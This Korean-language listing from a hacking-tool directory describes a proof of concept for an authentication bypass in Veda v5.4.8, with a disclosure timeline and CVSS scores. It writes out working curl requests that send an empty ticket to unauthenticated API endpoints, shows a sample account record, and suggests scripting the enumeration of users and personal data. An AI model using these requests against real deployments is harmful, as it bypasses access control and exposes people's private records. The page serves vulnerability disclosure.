Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-66698 — CVE-2025-66698에 대한 개념 증명: Veda v5.4.8에서 빈 ticket 매개변수를 통한 인증 우회, 인증되지 않은 API 엔드포인트를 통해 사용자, 정책 및 개인식별정보(PII) 열거 가능. | Kitploit
도구/GitHubGitHub/perunchess/cve-2025-66698
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringAuthentication
GitHubperunchess/cve-2025-66698

CVE-2025-66698

CVE-2025-66698에 대한 개념 증명: Veda v5.4.8에서 빈 ticket 매개변수를 통한 인증 우회, 인증되지 않은 API 엔드포인트를 통해 사용자, 정책 및 개인식별정보(PII) 열거 가능.

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-66698

대상 소프트웨어: Veda (Semantic Machines) v5.4.8 (이전 버전 대부분 포함). 취약점 유형: 인증 우회. CVE ID: CVE-2025-66698. 요약: 시스템이 ticket 매개변수를 부적절하게 검증하여, 빈 문자열을 유효한 세션으로 처리합니다. 프로젝트 링크: Veda (Semantic Machines)

2025년 11월 18일: 발견 및 초기 CVE 요청. 2026년 1월 9일: CVE ID 할당. 공급업체에 연락 시도 (무시 및 삭제됨). 2026년 1월 13일: 공급업체의 응답 부재로 인한 공개 공개.

이 취약점은 코드를 검토하는 보안 연구 과정에서 발견되었습니다. 코드의 ticket 매개변수는 빈 값에 대한 검사를 수행하지 않습니다.

영향을 받는 일부 API 엔드포인트:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k ("true" 반환)

열거할 수 있는 많은 기본 사용자가 있으며, cfg를 v-s 등으로 변경하여 사용자, 정책, PII(전체 이름, 사진, 직함, 생년월일, 연락처 정보 등) 등을 열거할 수도 있습니다.

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

해야 할 일은 이러한 엔터티 "xxx:xxx"(cfg:xxx, v-s:xxx 등)를 계속해서 더 많이 찾는 것입니다. 이를 위해 간단한 bash 스크립트를 작성할 수 있습니다. 동일한 결과를 얻기 위한 하드코딩된 systicket도 있습니다.

CVSS 평가:

  • CVSS 3.1 벡터: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 점수: 8.6 (높음)
  • CVSS 4.0 벡터: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N 점수: 9.3 (심각)
도구 다운로드